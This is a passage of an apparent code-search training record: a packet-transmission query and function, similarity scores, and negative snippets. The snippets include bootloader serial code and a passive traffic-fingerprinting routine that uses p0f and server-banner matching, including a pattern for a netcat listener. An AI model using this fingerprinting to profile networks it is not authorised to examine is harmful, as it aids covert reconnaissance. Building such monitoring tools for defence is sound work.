dataOut\n checksum = self.calcChecksum(txFrame, length + 4)\n txFrame = 
txFrame + bytes([checksum & 0xff])\n txFrame = txFrame + bytes([(checksum >> 8) & 0xff])\n\n accessAddr = (0x0212 + (checksum ^ 0xffff)) & 0xfffe # 0x0212: Address of wCHKSUM\n if self.BSLMemAccessWarning and accessAddr < self.BSL_CRITICAL_ADDR:\n sys.stderr.write(\"WARNING: This command might change data at address %04x or %04x!\\n\" % (accessAddr, accessAddr + 1))\n\n self.serialport.flushInput() #clear receiving queue\n #TODO: Check after each transmitted character,\n #TODO: if microcontroller did send a character (probably a NAK!).\n for c in txFrame:\n self.serialport.write(bytes([c]))\n if DEBUG > 3: sys.stderr.write(\"\\ttx %02x\" % c)\n #if self.serialport.inWaiting(): break #abort when BSL replies, probably NAK\n else:\n if DEBUG > 1: sys.stderr.write(\" comTxRx() transmit OK\\n\")\n\n #Receiving part -------------------------------------------\n rxHeader, rxNum = self.comRxHeader() #receive header\n if DEBUG > 1: sys.stderr.write(\" comTxRx() rxHeader=0x%02x, rxNum=%d, seqNo=%d, reqNo=%s\\n\" % (rxHeader, rxNum, self.seqNo, self.reqNo))\n if rxHeader == self.DATA_ACK: #acknowledge/OK\n if DEBUG > 2: sys.stderr.write(\" comTxRx() DATA_ACK\\n\")\n if rxNum == self.reqNo:\n self.seqNo = self.reqNo\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_ACK OK\\n\")\n return #Acknowledge received correctly => next frame\n raise BSLException(self.ERR_FRAME_NUMBER)\n elif rxHeader == self.DATA_NAK: #not acknowledge/error\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_NAK\\n\")\n raise BSLException(self.ERR_RX_NAK)\n elif rxHeader == self.DATA_FRAME: #receive data\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() DATA_FRAME\\n\")\n if rxNum == self.reqNo:\n rxFrame = self.comRxFrame(rxNum)\n return rxFrame\n raise BSLException(self.ERR_FRAME_NUMBER)\n elif rxHeader == self.CMD_FAILED: #Frame ok, but command failed.\n if DEBUG > 2: sys.stderr.write(\"* comTxRx() CMD_FAILED\\n\")\n raise BSLException(self.ERR_CMD_FAILED)\n\n raise BSLException(\"Unknown header 0x%02x\\nAre you downloading to RAM into an old device that requires the patch? Try option -U\" % rxHeader)", "def message_ports_out(self):\n return _spacegrant_swig.ax25_pdu_packer_sptr_message_ports_out(self)" ]
[ "0.5656294", "0.5640042", "0.5389474", "0.53658545", "0.52940327", "0.52939874", "0.5285707", "0.51725745", "0.51605856", "0.5146283", "0.51232743", "0.5088026", "0.5069205", "0.50586265", "0.50550586", "0.50533634", "0.50321823", "0.5028129", "0.49887457", "0.4957033", "0.4946684", "0.49410564", "0.4940173", "0.4939851", "0.4922899", "0.49202242", "0.49056667", "0.48948038", "0.4893408", "0.48837185", "0.48783392", "0.48656043", "0.48623356", "0.48585415", "0.48577854", "0.48412442", "0.4837226", "0.48307425", "0.4830727", "0.48223415", "0.48149243", "0.48100314", "0.4808379", "0.48031336", "0.47983825", "0.47902742", "0.47891858", "0.47880217", "0.47867602", "0.47822276", "0.47777483", "0.47699493", "0.47674575", "0.47656888", "0.47581092", "0.47344965", "0.47258064", "0.47177288", "0.46936885", "0.46864998", "0.46849874", "0.4684327", "0.46821818", "0.46807548", "0.46801513", "0.4679476", "0.4677317", "0.4677267", "0.46708405", "0.4667947", "0.4665545", "0.46637154", "0.4663524", "0.46627697", "0.46620202", "0.46600577", "0.46558785", "0.46555975", "0.4652437", "0.46511704", "0.4646952", "0.4646281", "0.46406084", "0.46406084", "0.46396372", "0.46373197", "0.46361962", "0.4630272", "0.46298832", "0.4621737", "0.46196014", "0.46134067", "0.46054935", "0.4604459", "0.4603902", "0.4603777", "0.4596059", "0.45908573", "0.45881534", "0.4586964" ]
0.655866
0
Process interface that sends a packet parsed_packet The packet instance to transmit
def process(self, parsed_packet): byte_buf = parsed_packet.serialize() out_port= parsed_packet.get_field("intrinsic_metadata.egress_port") logging.debug("Transmit pkt id %d to %d" % (parsed_packet.id, out_port)) buf = bytearray(byte_buf) for idx in range((len(buf) + 19)/20): logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20)) self.transmit_handler(out_port, byte_buf)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, packet):\n pass", "def process(self, pkt):\n pass", "def _do_some_logic(self, packet):\n\n\n pass", "def process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def handle_packet(cls, packet: scapypacket):\n pass", "def _pkt_handle(self, pkt):\n\n # snag any left over data from last read()\n # Parse the header to get type\n offset, payload_len, subtype, nxp_sniffer = lowpan.message.parse_header(pkt[0])\n\n\n # Extract the raw message bytes\n rawmsg = pkt[0][offset : offset + payload_len]\n if self.debug:\n print(pkt[1])\n print(util.hex_dump_buffer(rawmsg))\n\n\n\n # Now check for message handlers; preference is given to\n # handlers for a specific packet\n handled = False\n # Send to bridge socket\n if self.bdg_unix_addr:\n self.bridge_socket.sendto(rawmsg,self.bdg_unix_addr)\n handled = True\n\n if subtype in self.handlers.keys():\n handled = self.handlers[subtype](self, nxp_sniffer, rawmsg)\n if not handled and (\"all\" in self.handlers.keys()):\n handled = self.handlers[\"all\"](self, nxp_sniffer, rawmsg)\n\n if not handled: # Not handled, enqueue\n with self.packets_cv:\n if len(self.packets) >= self.max_pkts:\n self.packets.pop(0)\n self.packets_expired += 1\n self.packets.append((nxp_sniffer, rawmsg))\n self.packets_cv.notify_all()\n self.packets_total += 1\n else:\n self.packets_handled += 1\n self.logger.debug(\"Message handled by callback\")", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def processmessage(self,pktMessage):\n raise NotImplementedError()", "def handle_packet(self, packet):\n if self.compression:\n compression_len, packet = ParseVarInt(packet, consume=True)\n\n # if we have compressed data decompress it\n if compression_len != 0:\n packet = zlib.decompress(bytearray(packet))\n\n packet_id, packet = ParseVarInt(packet, consume=True)\n try:\n packet_id = str(self.state(packet_id))\n except ValueError:\n # print(\"Unknown packet ID %s for state %s\" % (hex(packet_id), self.state))\n pass\n\n try:\n func = getattr(self, \"handle_\" + packet_id.split(\".\")[1])\n packet = 
func(packet=packet)\n assert len(packet) == 0\n except AttributeError:\n # print(\"Unknown packet: %s\" % packet)\n pass", "def process_udp_packet(self, packet_data, packet_source):\n # Add your logic here, after your logic is done,\n # add the packet to be sent to self.packet_buffer\n # feel free to remove this line\n print(f\"Received a packet from {packet_source}\")\n in_packet = self._parse_udp_packet(packet_data)\n out_packet = self._do_some_logic(in_packet)\n\n # This shouldn't change.\n self.packet_buffer.append(out_packet)\n\n return in_packet", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable 
and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = 
True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not 
NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", 
sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = 
